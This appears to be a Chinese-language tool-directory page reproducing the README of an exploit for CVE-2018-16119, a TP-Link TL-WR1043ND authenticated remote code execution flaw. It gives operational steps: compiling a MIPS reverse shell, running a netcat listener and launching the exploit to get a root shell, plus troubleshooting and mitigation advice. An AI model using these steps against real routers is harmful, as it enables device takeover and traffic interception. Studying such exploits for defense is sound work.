Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/hdbreaker/cve-2018-16119
嵌入式系统安全物联网安全漏洞利用Web应用程序漏洞利用渗透测试硬件安全学习与教育红队Payload 开发
GitHubhdbreaker/cve-2018-16119

CVE-2018-16119

TP-Link TL-WR1043ND - 认证远程代码执行

查看仓库
163151年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2018-16119:TP-Link WR1043ND 中的认证远程代码执行漏洞

概述

CVE-2018-16119 是一个影响 TP-Link TL-WR1043ND 路由器的严重认证远程代码执行漏洞。该漏洞允许经过认证的攻击者在目标设备上以 root 权限执行任意命令,可能导致系统完全沦陷。

CVE 详情: CVE-2018-16119

漏洞影响

  • 攻击向量: 网络
  • 攻击复杂度: 低
  • 所需权限: 低(需要认证)
  • 用户交互: 无
  • 影响范围: 已改变
  • 影响: 设备机密性、完整性和可用性完全沦陷

一旦被利用,攻击者将获得路由器的 root shell 访问权限,从而能够:

  • 修改路由器配置
  • 监控网络流量
  • 将设备用作横向移动的跳板
  • 安装持久化后门
  • 破坏网络连接

受影响的设备

  • TP-Link TL-WR1043ND(多个固件版本)
  • 可能还有其他使用类似固件的 TP-Link 设备

前提条件

系统要求

  • 具有 root 权限的 Linux 主机(TFTP 服务器需要在端口 69 上运行)
  • Docker(用于交叉编译)
  • 与目标设备的网络连接
  • 目标路由器的有效认证凭据

依赖项

root@kitploit:~
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io

利用指南

步骤 1:编译反向 Shell 载荷

该漏洞利用需要一个 MIPS 大端序反向 Shell 二进制文件。请按照以下步骤进行编译:

root@kitploit:~
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/

# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash

在 Docker 容器内:

root@kitploit:~
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh

退出 Docker 并复制编译好的二进制文件:

root@kitploit:~
cp /tmp/shh exploit/tftp_server/

步骤 2:设置反向 Shell 监听器

打开一个终端,在端口 9669 上启动 netcat 监听器:

Linux:

root@kitploit:~
nc -l -p 9669 -vv

macOS:

root@kitploit:~
nc -l 9669 -vv

步骤 3:执行漏洞利用

使用 root 权限运行漏洞利用脚本(TFTP 服务器需要 root 权限):

root@kitploit:~
sudo python3 exploit/exploit.py

该脚本将:

  1. 向目标路由器进行认证
  2. 在端口 69 上启动 TFTP 服务器
  3. 利用该漏洞下载并执行反向 Shell
  4. 与你的监听器建立反向连接

步骤 4:与 Shell 交互

连接建立后:

  • 你将获得路由器的 root 访问权限
  • 初始时不会显示详细输出
  • 直接输入命令即可与 Shell 交互

项目结构

root@kitploit:~
CVE-2018-16119/
├── exploit/
│   ├── exploit.py              # Main exploit script
│   ├── requirements.txt        # Python dependencies
│   ├── notes.txt              # Additional notes
│   └── tftp_server/
│       ├── reverse_shell_mipsbe.c  # Reverse shell source code
│       └── shh                     # Compiled MIPS binary
├── firmware/
│   └── wr740nv4_webrevert.bin     # Sample firmware
├── squashfs-root/                  # Extracted firmware filesystem
└── README.md                       # This file

安全注意事项

负责任披露

该漏洞已经过负责任地披露,仅应将其用于:

  • 经授权的渗透测试
  • 受控环境中的安全研究
  • 教育目的

法律声明

⚠️ 警告:本漏洞利用工具仅用于教育和授权测试目的。未经授权访问计算机系统是非法且不道德的行为。用户有责任确保在使用本工具前已获得相应授权。

缓解建议

  • 更新到最新固件版本
  • 更改默认管理凭据
  • 如非必要,禁用远程管理
  • 实施网络分段
  • 监控可疑的网络活动

依赖项

安装 Python 依赖:

root@kitploit:~
pip3 install -r exploit/requirements.txt

故障排除

常见问题

TFTP 服务器权限被拒绝:

  • 确保脚本以 root 权限运行
  • 检查端口 69 是否已被占用

连接失败:

  • 验证与目标的网络连接
  • 确认认证凭据是否正确
  • 检查防火墙设置

Shell 无响应:

  • Shell 可能需要一些时间来初始化
  • 尝试按回车键或输入 id、pwd 等基本命令

研究与开发

这项研究展示了嵌入式设备固件中的严重安全缺陷。该漏洞凸显了以下方面的重要性:

  • 嵌入式系统中的安全编码实践
  • 对 IoT 设备进行定期安全审计
  • 及时进行固件更新和补丁管理

参考链接

  • CVE-2018-16119 官方条目
  • TP-Link 安全公告

联系方式与致谢

研究人员: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi


这项研究是出于教育目的以及改善嵌入式系统安全性而进行的。请负责任地使用。

下载工具